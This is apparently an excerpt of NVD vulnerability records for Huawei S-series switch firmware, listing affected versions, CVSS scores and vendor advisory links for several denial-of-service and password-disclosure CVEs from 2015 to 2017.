                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB2A3C92-C5C6-4BE6-A9F6-21C28D68C080",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "886E9D1F-25FA-41FA-A64B-E42B9910D2B3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E7DB9D3-BB34-49BE-8302-A054D79FE8D6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FEF2710B-60F7-42A5-83AA-14589DC0358D",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D78DAB13-32AA-4813-AB0A-0EA870F41183",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "36AB80F7-1BD2-4169-AC70-708CE84BB15C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r009c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "01A0EC8F-6A8A-487F-A92A-789E3789788F",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets.",
      },
      {
         lang: "es",
         value: "Huawei S5300 con software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 con software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 con software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 con software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 con software V200R007C00, V200R008C00, V200R009C00; S9300 con software V200R007C00, V200R008C00, V200R009C00; S9700 con software V200R007C00, V200R008C00, V200R009C00; y S12700 con software V200R007C00, V200R007C01, V200R008C00, V200R009C00 permiten al atacante provocar una condición de denegación de servicio enviando paquetes MPLS mal formados.",
      },
   ],
   id: "CVE-2016-8773",
   lastModified: "2024-11-21T03:00:01.690",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 5,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-04-02T20:59:01.407",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
      },
      {
         source: "psirt@huawei.com",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/94285",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/94285",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2016-09-26 15:59
Modified
2025-04-12 10:46
Summary
Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets.
Impacted products
Vendor Product Version
huawei s5300_firmware v200r001c00
huawei s5300_firmware v200r002c00
huawei s5300_firmware v200r003c00
huawei s5300_firmware v200r005c00
huawei s5300_firmware v200r005c01
huawei s5300_firmware v200r005c02
huawei s5300_firmware v200r006c00
huawei s5300_firmware v200r007c00
huawei s5300_firmware v200r008c00
huawei s5300 -
huawei s12700_firmware v200r005c00
huawei s12700_firmware v200r006c00
huawei s12700_firmware v200r008c00
huawei s12700 -
huawei s6300_firmware v200r001c00
huawei s6300_firmware v200r002c00
huawei s6300_firmware v200r003c00
huawei s6300_firmware v200r005c00
huawei s6300_firmware v200r005c01
huawei s6300_firmware v200r005c02
huawei s6300_firmware v200r008c00
huawei s6300 -
huawei s7700_firmware v200r001c00
huawei s7700_firmware v200r002c00
huawei s7700_firmware v200r003c00
huawei s7700_firmware v200r005c00
huawei s7700_firmware v200r006c00
huawei s7700_firmware v200r008c00
huawei s7700 -
huawei s5700_firmware v200r001c00
huawei s5700_firmware v200r001c01
huawei s5700_firmware v200r002c00
huawei s5700_firmware v200r003c00
huawei s5700_firmware v200r003c02
huawei s5700_firmware v200r005c00
huawei s5700_firmware v200r006c00
huawei s5700_firmware v200r008c00
huawei s5700 -
huawei s6700_firmware v200r001c00
huawei s6700_firmware v200r001c01
huawei s6700_firmware v200r002c00
huawei s6700_firmware v200r003c00
huawei s6700_firmware v200r008c00
huawei s6700 -
huawei s9700_firmware v200r001c00
huawei s9700_firmware v200r001c01
huawei s9700_firmware v200r002c00
huawei s9700_firmware v200r003c00
huawei s9700_firmware v200r005c00
huawei s9700_firmware v200r006c00
huawei s9700_firmware v200r008c00
huawei s9700 -
huawei s9300_firmware v200r001c00
huawei s9300_firmware v200r003c00
huawei s9300_firmware v200r005c00
huawei s9300_firmware v200r006c00
huawei s9300_firmware v200r008c00
huawei s9300 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7CD6E677-2031-4AC4-A5FE-DED60F789127",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8FD118E1-317E-4903-A4D0-51EBCFA58C5B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD601FFF-E623-4ADC-B286-D11B8004D7CF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5EAEF900-7C8C-4569-B74B-A802F951CC47",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB2B09C5-81F1-48B4-940D-6DFD06200139",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "EDC356D3-F015-46A0-8F7A-1C594F19535B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "58C2E728-E8F2-461D-A069-4BEC88B94FD0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD6B13D4-07F3-4CB5-8194-89781E685A78",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5454BC21-A04F-4B3D-8533-2414B6E1BC8C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7D81469B-EC6C-493D-B632-4DF821A1F304",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D6F2C4C7-3438-42B8-8999-C17E45C8CF49",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s12700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BD4C5CC9-FD60-4C64-8F88-CFC71BBEA663",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s12700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "138C1E57-176C-46B1-9704-D9C8391CC802",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A680CFA-9C46-453D-A5BC-8ED1EBD45C2B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C9B67169-BF28-4493-89E9-9AAB895D9456",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C330A14-C941-4B28-AA9C-B78A96A9011D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C6818ECD-730B-40D6-9108-B8540CC4BF1E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "C5EF72D9-ABCC-474C-A6B2-67944C32ED5C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "B4FBF354-D5BD-438A-9348-B65A45789053",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "939C73D9-E0E9-47A5-970E-6C84F5ECD2D7",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA3C8988-A1FC-4B04-9134-F2BDDADEAFB5",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "F49D3EAD-1EB3-4C62-80BA-4C9C3CE0408C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D75B012-A57D-4C6D-AB26-51D2ECC02F35",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1DFF0C0-AA17-4AA1-A418-4759D1A58852",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "D84F05D5-BA7D-485B-91C2-273349335CFB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF3FB3CC-2EAC-4A08-BDDC-DCACEE9FA2AE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D79CD09-3414-4105-AD59-F3D1BAC61B7E",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "336AA440-AEF4-482B-A037-8976DC38BA1A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "228D261C-DB88-4AEE-91D3-772DD28E4CDE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3B2DE9FE-5EC9-462E-86F0-EE772C944DFC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4907FBB8-5157-460D-9240-DD7D610C0FCC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "2898D6C5-77AB-4C1F-8134-B2DBD13EDB81",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCF23DAE-1215-41B2-88C5-4436D846266C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5973A534-F961-4A97-B20E-994BA28AFE29",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "21FFF548-FBEF-468A-A8DE-1DB1B7C0B3AF",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B7B7285-F4C6-415C-A948-D7612750A77D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "9CD40F46-5E04-43F0-A2DB-0ACBEC92C53F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4D6DC0AF-017E-41BC-A19D-F9AA055F5224",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "749B68B9-9F62-4E7A-AC86-F4073BA32E18",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "8DA5CF67-A58B-4666-B87E-712507233453",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA7AC10D-B0DD-4206-8642-134DDD585C06",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2B1F0B3D-1923-42C3-A3DB-03D11BE059D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "032E5E4D-B1B8-4659-8B62-3DC237234501",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "4FB6ED15-477B-4BB5-AA94-0D7897FBD962",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "06AD9ACA-E0C3-4096-BE50-94E717CDA318",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "325D6523-A07A-48D4-AD44-CF838BD77432",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC7E622-010C-4C5D-8AA6-D4793AFCE0E0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "36AB80F7-1BD2-4169-AC70-708CE84BB15C",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "E8F37BC5-3B25-4E30-A1CA-5ACFA46119B5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "473B6E52-E60F-4D3C-9028-E362DF2A8327",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2632DC1D-0CB9-4493-9270-436139C88623",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "BC8AE44D-1924-4C01-B4B9-CC5BF485A3EB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0E7DB9D3-BB34-49BE-8302-A054D79FE8D6",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Memory leak in Huawei S9300, S5300, S5700, S6700, S7700, S9700, and S12700 devices allows remote attackers to cause a denial of service (memory consumption and restart) via a large number of malformed packets.",
      },
      {
         lang: "es",
         value: "Fuga de memoria en dispositivos Huawei S9300, S5300, S5700, S6700, S7700, S9700 y S12700 permite a atacantes remotos provocar una denegación de servicio (consumo de memoria y reinicio) a través de un gran número de paquetes malformados.",
      },
   ],
   id: "CVE-2016-6518",
   lastModified: "2025-04-12T10:46:40.837",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 5,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2016-09-26T15:59:01.780",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/92968",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160914-01-sep-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Third Party Advisory",
            "VDB Entry",
         ],
         url: "http://www.securityfocus.com/bid/92968",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-399",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2016-01-15 19:59
Modified
2025-04-12 10:46
Summary
Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display.
Impacted products
Vendor Product Version
huawei s5300_firmware v200r005c02
huawei s5300 *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                     matchCriteriaId: "EDC356D3-F015-46A0-8F7A-1C594F19535B",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF480893-332C-48EB-9402-0E3ABEE28C2A",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei S5300 Campus Series switches with software before V200R005SPH008 do not mask the password when uploading files, which allows physically proximate attackers to obtain sensitive password information by reading the display.",
      },
      {
         lang: "es",
         value: "Switches Huawei S5300 Campus Series con software anterior a V200R005SPH008 no enmascara la contraseña cuando se cargan archivos, lo que permite a atacantes físicamente próximos obtener información sensible de contraseña leyendo la pantalla.",
      },
   ],
   id: "CVE-2015-8675",
   lastModified: "2025-04-12T10:46:40.837",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "LOW",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 2.1,
               confidentialityImpact: "PARTIAL",
               integrityImpact: "NONE",
               vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "LOCAL",
               availabilityImpact: "NONE",
               baseScore: 6.2,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "HIGH",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
               version: "3.0",
            },
            exploitabilityScore: 2.5,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2016-01-15T19:59:00.117",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160112-01-switch-en",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-255",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2017-04-02 20:59
Modified
2024-11-21 02:19
Summary
Huawei AC6605 with software V200R001C00; AC6605 with software V200R002C00; ACU with software V200R001C00; ACU with software V200R002C00; S2300, S3300, S2700, S3700 with software V100R006C05 and earlier versions; S5300, S5700, S6300, S6700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions; S7700, S9300, S9300E, S9700 with software V100R006, V200R001, V200R002, V200R003, V200R005C00SPC300 and earlier versions could allow remote attackers to send a special SSH packet to the VRP device to cause a denial of service.
Impacted products
Vendor Product Version
huawei ac6605_firmware ac6605_v200r001c00
huawei ac6605_firmware ac6605_v200r002c00
huawei ac6605 -
huawei acu_firmware acu_v200r001c00
huawei acu_firmware acu_v200r002c00
huawei acu -
huawei s_series_firmware v100r006c05
huawei s2300 -
huawei s2700 -
huawei s3300 -
huawei s3700 -
huawei s5300_firmware *
